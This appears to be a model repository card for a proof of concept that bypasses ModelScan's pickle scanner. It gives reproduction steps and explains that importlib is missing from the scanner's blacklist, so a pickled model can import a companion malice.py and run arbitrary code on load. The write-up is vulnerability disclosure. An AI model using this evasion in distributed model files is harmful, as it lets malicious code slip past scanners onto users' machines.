YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
ModelScan PickleUnsafeOpScan Bypass PoC
Steps to Reproduce
# 1. Scan with ModelScan
modelscan -p model.bin
# Output: Issues: 0, Errors: 0, Skipped: 0
# 2. Load the model
python3 -c "import pickle; pickle.load(open('model.bin','rb'))"
# 3. Check for RCE
cat /tmp/modelscan_bypass.txt
# Output: MODELSCAN_IMPORTLIB_BYPASS_SUCCESS
Technical Details
ModelScan's PickleUnsafeOpScan uses a hardcoded blacklist of unsafe modules in unsafe_globals. The importlib module is NOT in this blacklist, allowing importlib.import_module() to be used in pickle payloads without detection.
When the pickle is deserialized, importlib.import_module('malice') imports the companion malice.py file, executing arbitrary Python code at module import time.
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support